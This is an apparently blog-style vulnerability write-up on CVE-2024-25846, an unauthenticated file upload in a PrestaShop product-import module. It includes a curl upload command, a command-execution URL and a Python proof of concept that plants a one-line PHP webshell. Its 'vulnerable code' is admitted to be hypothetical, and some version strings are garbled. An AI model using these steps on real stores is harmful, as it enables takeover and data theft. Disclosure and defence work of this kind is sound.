CVE-2024-25846 - PrestaShop Product Catalog Import Module File Upload Vulnerability Deep Dive
Recently, a critical vulnerability (CVE-2024-25846) was discovered in the "Product Catalog (CSV, Excel) Import" module (also known as simpleimportproduct) for PrestaShop. This popular e-commerce module helps store owners import product details using CSV or Excel files. But versions 6.7. and below have a bug that allows anyone—including non-logged-in users (AKA "guests")—to upload files with any extension, including .php. This can let hackers upload webshells and fully compromise your store.
What is CVE-2024-25846?
CVE-2024-25846 is an unauthenticated file-upload vulnerability impacting the "Product Catalog (CSV, Excel) Import" module (simpleimportproduct) up to version 6.7. for PrestaShop.
Risk: Attackers can upload a PHP webshell and take over your whole store.
- Affected software: Product Catalog (CSV, Excel) Import simpleimportproduct ≤ 6.7..
Why is it Dangerous?
Most uploaders check *file extensions* to prevent dangerous uploads like .php. But this plugin's upload handler didn't properly validate uploaded file types OR check user permissions: anyone can send a file, and any extension is allowed—including code like backdoor.php.
This kind of bug is a direct path to remote code execution. An attacker doesn't need a password or any special access. They just send a *.php* file using the provided upload feature, then view that file in their browser to run system commands.
Where is the Vulnerability in Code?
Let's look at a simplified version of what goes wrong.
Hypothetical Vulnerable Code (PHP)
// File: modules/simpleimportproduct/upload.php
if (isset($_FILES['import_file'])) {
$upload_dir = _PS_MODULE_DIR_ . 'simpleimportproduct/uploads/';
$filename = $_FILES['import_file']['name']; // <--- No filtering!
// No checks for .php or other dangerous extensions!!
move_uploaded_file($_FILES['import_file']['tmp_name'], $upload_dir . $filename);
echo 'File uploaded!';
}
The file extension is not checked; PHP files are not filtered.
- The file is written to a web-accessible folder (simpleimportproduct/uploads/).
Locate the Uploader
- Find a PrestaShop store using this module (look for /modules/simpleimportproduct/).
`bash
curl -F "import_file=@shell.php" https://victim.shop/modules/simpleimportproduct/upload.php
Access the Shell and Run Commands
- Visit https://victim.shop/modules/simpleimportproduct/uploads/shell.php?cmd=whoami
Total Store Compromise
- The attacker now has remote command execution, allowing them to steal data, deface the page, or move laterally in your infrastructure.
Here's a real-world proof of concept in Python
import requests
url = 'https://victim.shop/modules/simpleimportproduct/upload.php'
files = {'import_file': ('shell.php', '<?php echo shell_exec($_GET["cmd"]); ?>')}
r = requests.post(url, files=files)
print('Upload result:', r.text)
print('Shell uploaded! Access it at /modules/simpleimportproduct/uploads/shell.php?cmd=id')
References and Further Reading
- Official Advisory (Packet Storm)
- NVD entry for CVE-2024-25846
- MyPrestaModules Product Catalog Import
- OWASP PHP Unrestricted File Upload Cheat Sheet
If an update is available, install the latest, patched version.
- Contact MyPrestaModules support if unsure.
Check Your Web Server for Malicious Files.
- Look inside /modules/simpleimportproduct/uploads/ for .php or suspicious files.
Delete anything you didn't upload yourself.
4. Harden File Uploads (see OWASP guide)
Conclusion
CVE-2024-25846 is a textbook example of a simple upload bug with catastrophic results. If you run PrestaShop and use "Product Catalog (CSV, Excel) Import," make sure you patch immediately, check your existing files, and always be vigilant with file upload features.
Never let your site's file uploads become an open door for attackers. If you need help, reach out to your hosting provider or a qualified security professional.
Timeline
Published on: 02/27/2024 17:15:12 UTC
Last modified on: 08/08/2024 20:35:05 UTC